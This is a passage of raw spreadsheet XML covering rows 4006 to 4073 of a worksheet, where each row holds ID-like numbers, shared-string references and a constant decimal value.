      <c r="D4006" s="2">
        <v>1.0</v>
      </c>
      <c r="E4006" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4006" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4007" ht="15.75" customHeight="1">
      <c r="A4007" s="1">
        <v>5011.0</v>
      </c>
      <c r="B4007" s="2">
        <v>4.4197021E7</v>
      </c>
      <c r="C4007" s="2" t="s">
        <v>3800</v>
      </c>
      <c r="D4007" s="2">
        <v>1.0</v>
      </c>
      <c r="E4007" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4007" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4008" ht="15.75" customHeight="1">
      <c r="A4008" s="1">
        <v>5018.0</v>
      </c>
      <c r="B4008" s="2">
        <v>4.4215231E7</v>
      </c>
      <c r="C4008" s="2" t="s">
        <v>3801</v>
      </c>
      <c r="D4008" s="2">
        <v>1.0</v>
      </c>
      <c r="E4008" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4008" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4009" ht="15.75" customHeight="1">
      <c r="A4009" s="1">
        <v>5131.0</v>
      </c>
      <c r="B4009" s="2">
        <v>4.4623925E7</v>
      </c>
      <c r="C4009" s="2" t="s">
        <v>3802</v>
      </c>
      <c r="D4009" s="2">
        <v>1.0</v>
      </c>
      <c r="E4009" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4009" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4010" ht="15.75" customHeight="1">
      <c r="A4010" s="1">
        <v>5226.0</v>
      </c>
      <c r="B4010" s="2">
        <v>4.4969924E7</v>
      </c>
      <c r="C4010" s="2" t="s">
        <v>3803</v>
      </c>
      <c r="D4010" s="2">
        <v>1.0</v>
      </c>
      <c r="E4010" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4010" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4011" ht="15.75" customHeight="1">
      <c r="A4011" s="1">
        <v>5382.0</v>
      </c>
      <c r="B4011" s="2">
        <v>4.5416569E7</v>
      </c>
      <c r="C4011" s="2" t="s">
        <v>3804</v>
      </c>
      <c r="D4011" s="2">
        <v>1.0</v>
      </c>
      <c r="E4011" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4011" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4012" ht="15.75" customHeight="1">
      <c r="A4012" s="1">
        <v>5425.0</v>
      </c>
      <c r="B4012" s="2">
        <v>4.5569488E7</v>
      </c>
      <c r="C4012" s="2" t="s">
        <v>3805</v>
      </c>
      <c r="D4012" s="2">
        <v>1.0</v>
      </c>
      <c r="E4012" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4012" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4013" ht="15.75" customHeight="1">
      <c r="A4013" s="1">
        <v>5426.0</v>
      </c>
      <c r="B4013" s="2">
        <v>4.5572826E7</v>
      </c>
      <c r="C4013" s="2" t="s">
        <v>3806</v>
      </c>
      <c r="D4013" s="2">
        <v>1.0</v>
      </c>
      <c r="E4013" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4013" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4014" ht="15.75" customHeight="1">
      <c r="A4014" s="1">
        <v>5461.0</v>
      </c>
      <c r="B4014" s="2">
        <v>4.5662049E7</v>
      </c>
      <c r="C4014" s="2" t="s">
        <v>3807</v>
      </c>
      <c r="D4014" s="2">
        <v>1.0</v>
      </c>
      <c r="E4014" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4014" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4015" ht="15.75" customHeight="1">
      <c r="A4015" s="1">
        <v>5491.0</v>
      </c>
      <c r="B4015" s="2">
        <v>4.5775107E7</v>
      </c>
      <c r="C4015" s="2" t="s">
        <v>3808</v>
      </c>
      <c r="D4015" s="2">
        <v>1.0</v>
      </c>
      <c r="E4015" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4015" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4016" ht="15.75" customHeight="1">
      <c r="A4016" s="1">
        <v>5941.0</v>
      </c>
      <c r="B4016" s="2">
        <v>4.7277072E7</v>
      </c>
      <c r="C4016" s="2" t="s">
        <v>3809</v>
      </c>
      <c r="D4016" s="2">
        <v>1.0</v>
      </c>
      <c r="E4016" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4016" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4017" ht="15.75" customHeight="1">
      <c r="A4017" s="1">
        <v>6505.0</v>
      </c>
      <c r="B4017" s="2">
        <v>4.8732244E7</v>
      </c>
      <c r="C4017" s="2" t="s">
        <v>3810</v>
      </c>
      <c r="D4017" s="2">
        <v>1.0</v>
      </c>
      <c r="E4017" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4017" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4018" ht="15.75" customHeight="1">
      <c r="A4018" s="1">
        <v>6609.0</v>
      </c>
      <c r="B4018" s="2">
        <v>4.9019926E7</v>
      </c>
      <c r="C4018" s="2" t="s">
        <v>3811</v>
      </c>
      <c r="D4018" s="2">
        <v>1.0</v>
      </c>
      <c r="E4018" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4018" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4019" ht="15.75" customHeight="1">
      <c r="A4019" s="1">
        <v>6734.0</v>
      </c>
      <c r="B4019" s="2">
        <v>4.9336415E7</v>
      </c>
      <c r="C4019" s="2" t="s">
        <v>3812</v>
      </c>
      <c r="D4019" s="2">
        <v>1.0</v>
      </c>
      <c r="E4019" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4019" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4020" ht="15.75" customHeight="1">
      <c r="A4020" s="1">
        <v>7014.0</v>
      </c>
      <c r="B4020" s="2">
        <v>5.0095074E7</v>
      </c>
      <c r="C4020" s="2" t="s">
        <v>3813</v>
      </c>
      <c r="D4020" s="2">
        <v>1.0</v>
      </c>
      <c r="E4020" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4020" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4021" ht="15.75" customHeight="1">
      <c r="A4021" s="1">
        <v>7293.0</v>
      </c>
      <c r="B4021" s="2">
        <v>5.0818491E7</v>
      </c>
      <c r="C4021" s="2" t="s">
        <v>3814</v>
      </c>
      <c r="D4021" s="2">
        <v>1.0</v>
      </c>
      <c r="E4021" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4021" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4022" ht="15.75" customHeight="1">
      <c r="A4022" s="1">
        <v>7422.0</v>
      </c>
      <c r="B4022" s="2">
        <v>5.1160155E7</v>
      </c>
      <c r="C4022" s="2" t="s">
        <v>3815</v>
      </c>
      <c r="D4022" s="2">
        <v>1.0</v>
      </c>
      <c r="E4022" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4022" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4023" ht="15.75" customHeight="1">
      <c r="A4023" s="1">
        <v>7494.0</v>
      </c>
      <c r="B4023" s="2">
        <v>5.1381535E7</v>
      </c>
      <c r="C4023" s="2" t="s">
        <v>3816</v>
      </c>
      <c r="D4023" s="2">
        <v>1.0</v>
      </c>
      <c r="E4023" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4023" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4024" ht="15.75" customHeight="1">
      <c r="A4024" s="1">
        <v>7640.0</v>
      </c>
      <c r="B4024" s="2">
        <v>5.1773894E7</v>
      </c>
      <c r="C4024" s="2" t="s">
        <v>3817</v>
      </c>
      <c r="D4024" s="2">
        <v>1.0</v>
      </c>
      <c r="E4024" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4024" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4025" ht="15.75" customHeight="1">
      <c r="A4025" s="1">
        <v>7775.0</v>
      </c>
      <c r="B4025" s="2">
        <v>5.2162315E7</v>
      </c>
      <c r="C4025" s="2" t="s">
        <v>3818</v>
      </c>
      <c r="D4025" s="2">
        <v>1.0</v>
      </c>
      <c r="E4025" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4025" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4026" ht="15.75" customHeight="1">
      <c r="A4026" s="1">
        <v>7925.0</v>
      </c>
      <c r="B4026" s="2">
        <v>5.2564287E7</v>
      </c>
      <c r="C4026" s="2" t="s">
        <v>3819</v>
      </c>
      <c r="D4026" s="2">
        <v>1.0</v>
      </c>
      <c r="E4026" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4026" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4027" ht="15.75" customHeight="1">
      <c r="A4027" s="1">
        <v>8040.0</v>
      </c>
      <c r="B4027" s="2">
        <v>5.2842954E7</v>
      </c>
      <c r="C4027" s="2" t="s">
        <v>3820</v>
      </c>
      <c r="D4027" s="2">
        <v>1.0</v>
      </c>
      <c r="E4027" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4027" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4028" ht="15.75" customHeight="1">
      <c r="A4028" s="1">
        <v>8041.0</v>
      </c>
      <c r="B4028" s="2">
        <v>5.2842954E7</v>
      </c>
      <c r="C4028" s="2" t="s">
        <v>3821</v>
      </c>
      <c r="D4028" s="2">
        <v>1.0</v>
      </c>
      <c r="E4028" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4028" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4029" ht="15.75" customHeight="1">
      <c r="A4029" s="1">
        <v>8049.0</v>
      </c>
      <c r="B4029" s="2">
        <v>5.2851682E7</v>
      </c>
      <c r="C4029" s="2" t="s">
        <v>3822</v>
      </c>
      <c r="D4029" s="2">
        <v>1.0</v>
      </c>
      <c r="E4029" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4029" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4030" ht="15.75" customHeight="1">
      <c r="A4030" s="1">
        <v>8068.0</v>
      </c>
      <c r="B4030" s="2">
        <v>5.294582E7</v>
      </c>
      <c r="C4030" s="2" t="s">
        <v>3823</v>
      </c>
      <c r="D4030" s="2">
        <v>1.0</v>
      </c>
      <c r="E4030" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4030" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4031" ht="15.75" customHeight="1">
      <c r="A4031" s="1">
        <v>8134.0</v>
      </c>
      <c r="B4031" s="2">
        <v>5.3119129E7</v>
      </c>
      <c r="C4031" s="2" t="s">
        <v>3824</v>
      </c>
      <c r="D4031" s="2">
        <v>1.0</v>
      </c>
      <c r="E4031" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4031" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4032" ht="15.75" customHeight="1">
      <c r="A4032" s="1">
        <v>9817.0</v>
      </c>
      <c r="B4032" s="2">
        <v>5.6617627E7</v>
      </c>
      <c r="C4032" s="2" t="s">
        <v>3825</v>
      </c>
      <c r="D4032" s="2">
        <v>1.0</v>
      </c>
      <c r="E4032" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4032" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4033" ht="15.75" customHeight="1">
      <c r="A4033" s="1">
        <v>9981.0</v>
      </c>
      <c r="B4033" s="2">
        <v>5.6950732E7</v>
      </c>
      <c r="C4033" s="2" t="s">
        <v>3826</v>
      </c>
      <c r="D4033" s="2">
        <v>1.0</v>
      </c>
      <c r="E4033" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4033" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4034" ht="15.75" customHeight="1">
      <c r="A4034" s="1">
        <v>10134.0</v>
      </c>
      <c r="B4034" s="2">
        <v>5.7296067E7</v>
      </c>
      <c r="C4034" s="2" t="s">
        <v>3827</v>
      </c>
      <c r="D4034" s="2">
        <v>1.0</v>
      </c>
      <c r="E4034" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4034" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4035" ht="15.75" customHeight="1">
      <c r="A4035" s="1">
        <v>10176.0</v>
      </c>
      <c r="B4035" s="2">
        <v>5.7378093E7</v>
      </c>
      <c r="C4035" s="2" t="s">
        <v>3828</v>
      </c>
      <c r="D4035" s="2">
        <v>1.0</v>
      </c>
      <c r="E4035" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4035" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4036" ht="15.75" customHeight="1">
      <c r="A4036" s="1">
        <v>10319.0</v>
      </c>
      <c r="B4036" s="2">
        <v>5.7702061E7</v>
      </c>
      <c r="C4036" s="2" t="s">
        <v>3829</v>
      </c>
      <c r="D4036" s="2">
        <v>1.0</v>
      </c>
      <c r="E4036" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4036" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4037" ht="15.75" customHeight="1">
      <c r="A4037" s="1">
        <v>10461.0</v>
      </c>
      <c r="B4037" s="2">
        <v>1.0730179E7</v>
      </c>
      <c r="C4037" s="2" t="s">
        <v>3830</v>
      </c>
      <c r="D4037" s="2">
        <v>1.0</v>
      </c>
      <c r="E4037" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4037" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4038" ht="15.75" customHeight="1">
      <c r="A4038" s="1">
        <v>10500.0</v>
      </c>
      <c r="B4038" s="2">
        <v>1.1371178E7</v>
      </c>
      <c r="C4038" s="2" t="s">
        <v>3831</v>
      </c>
      <c r="D4038" s="2">
        <v>1.0</v>
      </c>
      <c r="E4038" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4038" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4039" ht="15.75" customHeight="1">
      <c r="A4039" s="1">
        <v>10686.0</v>
      </c>
      <c r="B4039" s="2">
        <v>1.4701873E7</v>
      </c>
      <c r="C4039" s="2" t="s">
        <v>3832</v>
      </c>
      <c r="D4039" s="2">
        <v>1.0</v>
      </c>
      <c r="E4039" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4039" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4040" ht="15.75" customHeight="1">
      <c r="A4040" s="1">
        <v>10941.0</v>
      </c>
      <c r="B4040" s="2">
        <v>1.7018127E7</v>
      </c>
      <c r="C4040" s="2" t="s">
        <v>3833</v>
      </c>
      <c r="D4040" s="2">
        <v>1.0</v>
      </c>
      <c r="E4040" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4040" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4041" ht="15.75" customHeight="1">
      <c r="A4041" s="1">
        <v>11597.0</v>
      </c>
      <c r="B4041" s="2">
        <v>2.2916007E7</v>
      </c>
      <c r="C4041" s="2" t="s">
        <v>3834</v>
      </c>
      <c r="D4041" s="2">
        <v>1.0</v>
      </c>
      <c r="E4041" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4041" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4042" ht="15.75" customHeight="1">
      <c r="A4042" s="1">
        <v>12133.0</v>
      </c>
      <c r="B4042" s="2">
        <v>2.6975131E7</v>
      </c>
      <c r="C4042" s="2" t="s">
        <v>3835</v>
      </c>
      <c r="D4042" s="2">
        <v>1.0</v>
      </c>
      <c r="E4042" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4042" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4043" ht="15.75" customHeight="1">
      <c r="A4043" s="1">
        <v>12355.0</v>
      </c>
      <c r="B4043" s="2">
        <v>2.8692584E7</v>
      </c>
      <c r="C4043" s="2" t="s">
        <v>3836</v>
      </c>
      <c r="D4043" s="2">
        <v>1.0</v>
      </c>
      <c r="E4043" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4043" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4044" ht="15.75" customHeight="1">
      <c r="A4044" s="1">
        <v>12380.0</v>
      </c>
      <c r="B4044" s="2">
        <v>2.8831168E7</v>
      </c>
      <c r="C4044" s="2" t="s">
        <v>3837</v>
      </c>
      <c r="D4044" s="2">
        <v>1.0</v>
      </c>
      <c r="E4044" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4044" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4045" ht="15.75" customHeight="1">
      <c r="A4045" s="1">
        <v>12406.0</v>
      </c>
      <c r="B4045" s="2">
        <v>2.902123E7</v>
      </c>
      <c r="C4045" s="2" t="s">
        <v>3838</v>
      </c>
      <c r="D4045" s="2">
        <v>1.0</v>
      </c>
      <c r="E4045" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4045" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4046" ht="15.75" customHeight="1">
      <c r="A4046" s="1">
        <v>13121.0</v>
      </c>
      <c r="B4046" s="2">
        <v>3.3619964E7</v>
      </c>
      <c r="C4046" s="2" t="s">
        <v>3839</v>
      </c>
      <c r="D4046" s="2">
        <v>1.0</v>
      </c>
      <c r="E4046" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4046" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4047" ht="15.75" customHeight="1">
      <c r="A4047" s="1">
        <v>13355.0</v>
      </c>
      <c r="B4047" s="2">
        <v>3.4735541E7</v>
      </c>
      <c r="C4047" s="2" t="s">
        <v>3840</v>
      </c>
      <c r="D4047" s="2">
        <v>1.0</v>
      </c>
      <c r="E4047" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4047" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4048" ht="15.75" customHeight="1">
      <c r="A4048" s="1">
        <v>13482.0</v>
      </c>
      <c r="B4048" s="2">
        <v>3.5334813E7</v>
      </c>
      <c r="C4048" s="2" t="s">
        <v>3841</v>
      </c>
      <c r="D4048" s="2">
        <v>1.0</v>
      </c>
      <c r="E4048" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4048" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4049" ht="15.75" customHeight="1">
      <c r="A4049" s="1">
        <v>13822.0</v>
      </c>
      <c r="B4049" s="2">
        <v>3.6752267E7</v>
      </c>
      <c r="C4049" s="2" t="s">
        <v>3842</v>
      </c>
      <c r="D4049" s="2">
        <v>1.0</v>
      </c>
      <c r="E4049" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4049" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4050" ht="15.75" customHeight="1">
      <c r="A4050" s="1">
        <v>14018.0</v>
      </c>
      <c r="B4050" s="2">
        <v>3.7478716E7</v>
      </c>
      <c r="C4050" s="2" t="s">
        <v>3843</v>
      </c>
      <c r="D4050" s="2">
        <v>1.0</v>
      </c>
      <c r="E4050" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4050" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4051" ht="15.75" customHeight="1">
      <c r="A4051" s="1">
        <v>14154.0</v>
      </c>
      <c r="B4051" s="2">
        <v>3.8000963E7</v>
      </c>
      <c r="C4051" s="2" t="s">
        <v>3844</v>
      </c>
      <c r="D4051" s="2">
        <v>1.0</v>
      </c>
      <c r="E4051" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4051" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4052" ht="15.75" customHeight="1">
      <c r="A4052" s="1">
        <v>14547.0</v>
      </c>
      <c r="B4052" s="2">
        <v>3.9937989E7</v>
      </c>
      <c r="C4052" s="2" t="s">
        <v>3845</v>
      </c>
      <c r="D4052" s="2">
        <v>1.0</v>
      </c>
      <c r="E4052" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4052" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4053" ht="15.75" customHeight="1">
      <c r="A4053" s="1">
        <v>14897.0</v>
      </c>
      <c r="B4053" s="2">
        <v>4.1148769E7</v>
      </c>
      <c r="C4053" s="2" t="s">
        <v>3846</v>
      </c>
      <c r="D4053" s="2">
        <v>1.0</v>
      </c>
      <c r="E4053" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4053" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4054" ht="15.75" customHeight="1">
      <c r="A4054" s="1">
        <v>15415.0</v>
      </c>
      <c r="B4054" s="2">
        <v>4.2881336E7</v>
      </c>
      <c r="C4054" s="2" t="s">
        <v>3847</v>
      </c>
      <c r="D4054" s="2">
        <v>1.0</v>
      </c>
      <c r="E4054" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4054" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4055" ht="15.75" customHeight="1">
      <c r="A4055" s="1">
        <v>15468.0</v>
      </c>
      <c r="B4055" s="2">
        <v>4.3120835E7</v>
      </c>
      <c r="C4055" s="2" t="s">
        <v>3848</v>
      </c>
      <c r="D4055" s="2">
        <v>1.0</v>
      </c>
      <c r="E4055" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4055" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4056" ht="15.75" customHeight="1">
      <c r="A4056" s="1">
        <v>15514.0</v>
      </c>
      <c r="B4056" s="2">
        <v>4.3274373E7</v>
      </c>
      <c r="C4056" s="2" t="s">
        <v>3849</v>
      </c>
      <c r="D4056" s="2">
        <v>1.0</v>
      </c>
      <c r="E4056" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4056" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4057" ht="15.75" customHeight="1">
      <c r="A4057" s="1">
        <v>15532.0</v>
      </c>
      <c r="B4057" s="2">
        <v>4.3315012E7</v>
      </c>
      <c r="C4057" s="2" t="s">
        <v>3850</v>
      </c>
      <c r="D4057" s="2">
        <v>1.0</v>
      </c>
      <c r="E4057" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4057" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4058" ht="15.75" customHeight="1">
      <c r="A4058" s="1">
        <v>15959.0</v>
      </c>
      <c r="B4058" s="2">
        <v>4.4770538E7</v>
      </c>
      <c r="C4058" s="2" t="s">
        <v>3851</v>
      </c>
      <c r="D4058" s="2">
        <v>1.0</v>
      </c>
      <c r="E4058" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4058" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4059" ht="15.75" customHeight="1">
      <c r="A4059" s="1">
        <v>16218.0</v>
      </c>
      <c r="B4059" s="2">
        <v>4.5707392E7</v>
      </c>
      <c r="C4059" s="2" t="s">
        <v>3852</v>
      </c>
      <c r="D4059" s="2">
        <v>1.0</v>
      </c>
      <c r="E4059" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4059" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4060" ht="15.75" customHeight="1">
      <c r="A4060" s="1">
        <v>16845.0</v>
      </c>
      <c r="B4060" s="2">
        <v>4.7910053E7</v>
      </c>
      <c r="C4060" s="2" t="s">
        <v>3853</v>
      </c>
      <c r="D4060" s="2">
        <v>1.0</v>
      </c>
      <c r="E4060" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4060" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4061" ht="15.75" customHeight="1">
      <c r="A4061" s="1">
        <v>16953.0</v>
      </c>
      <c r="B4061" s="2">
        <v>4.8241317E7</v>
      </c>
      <c r="C4061" s="2" t="s">
        <v>3854</v>
      </c>
      <c r="D4061" s="2">
        <v>1.0</v>
      </c>
      <c r="E4061" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4061" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4062" ht="15.75" customHeight="1">
      <c r="A4062" s="1">
        <v>17001.0</v>
      </c>
      <c r="B4062" s="2">
        <v>4.8403572E7</v>
      </c>
      <c r="C4062" s="2" t="s">
        <v>3855</v>
      </c>
      <c r="D4062" s="2">
        <v>1.0</v>
      </c>
      <c r="E4062" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4062" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4063" ht="15.75" customHeight="1">
      <c r="A4063" s="1">
        <v>17153.0</v>
      </c>
      <c r="B4063" s="2">
        <v>4.8855268E7</v>
      </c>
      <c r="C4063" s="2" t="s">
        <v>3856</v>
      </c>
      <c r="D4063" s="2">
        <v>1.0</v>
      </c>
      <c r="E4063" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4063" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4064" ht="15.75" customHeight="1">
      <c r="A4064" s="1">
        <v>17492.0</v>
      </c>
      <c r="B4064" s="2">
        <v>4.9966557E7</v>
      </c>
      <c r="C4064" s="2" t="s">
        <v>3857</v>
      </c>
      <c r="D4064" s="2">
        <v>1.0</v>
      </c>
      <c r="E4064" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4064" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4065" ht="15.75" customHeight="1">
      <c r="A4065" s="1">
        <v>17531.0</v>
      </c>
      <c r="B4065" s="2">
        <v>5.0106567E7</v>
      </c>
      <c r="C4065" s="2" t="s">
        <v>3858</v>
      </c>
      <c r="D4065" s="2">
        <v>1.0</v>
      </c>
      <c r="E4065" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4065" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4066" ht="15.75" customHeight="1">
      <c r="A4066" s="1">
        <v>17898.0</v>
      </c>
      <c r="B4066" s="2">
        <v>5.1096644E7</v>
      </c>
      <c r="C4066" s="2" t="s">
        <v>3859</v>
      </c>
      <c r="D4066" s="2">
        <v>1.0</v>
      </c>
      <c r="E4066" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4066" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4067" ht="15.75" customHeight="1">
      <c r="A4067" s="1">
        <v>18039.0</v>
      </c>
      <c r="B4067" s="2">
        <v>5.1560341E7</v>
      </c>
      <c r="C4067" s="2" t="s">
        <v>3860</v>
      </c>
      <c r="D4067" s="2">
        <v>1.0</v>
      </c>
      <c r="E4067" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4067" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4068" ht="15.75" customHeight="1">
      <c r="A4068" s="1">
        <v>18040.0</v>
      </c>
      <c r="B4068" s="2">
        <v>5.1560341E7</v>
      </c>
      <c r="C4068" s="2" t="s">
        <v>3861</v>
      </c>
      <c r="D4068" s="2">
        <v>1.0</v>
      </c>
      <c r="E4068" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4068" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4069" ht="15.75" customHeight="1">
      <c r="A4069" s="1">
        <v>18282.0</v>
      </c>
      <c r="B4069" s="2">
        <v>5.2251498E7</v>
      </c>
      <c r="C4069" s="2" t="s">
        <v>3862</v>
      </c>
      <c r="D4069" s="2">
        <v>1.0</v>
      </c>
      <c r="E4069" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4069" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4070" ht="15.75" customHeight="1">
      <c r="A4070" s="1">
        <v>18471.0</v>
      </c>
      <c r="B4070" s="2">
        <v>5.2847441E7</v>
      </c>
      <c r="C4070" s="2" t="s">
        <v>3863</v>
      </c>
      <c r="D4070" s="2">
        <v>1.0</v>
      </c>
      <c r="E4070" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4070" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4071" ht="15.75" customHeight="1">
      <c r="A4071" s="1">
        <v>18846.0</v>
      </c>
      <c r="B4071" s="2">
        <v>5.397257E7</v>
      </c>
      <c r="C4071" s="2" t="s">
        <v>3864</v>
      </c>
      <c r="D4071" s="2">
        <v>1.0</v>
      </c>
      <c r="E4071" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4071" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4072" ht="15.75" customHeight="1">
      <c r="A4072" s="1">
        <v>18952.0</v>
      </c>
      <c r="B4072" s="2">
        <v>5.4346952E7</v>
      </c>
      <c r="C4072" s="2" t="s">
        <v>3865</v>
      </c>
      <c r="D4072" s="2">
        <v>1.0</v>
      </c>
      <c r="E4072" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4072" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4073" ht="15.75" customHeight="1">
      <c r="A4073" s="1">
        <v>19702.0</v>
      </c>
      <c r="B4073" s="2">
        <v>5.6519031E7</v>
      </c>
      <c r="C4073" s="2" t="s">
        <v>3866</v>
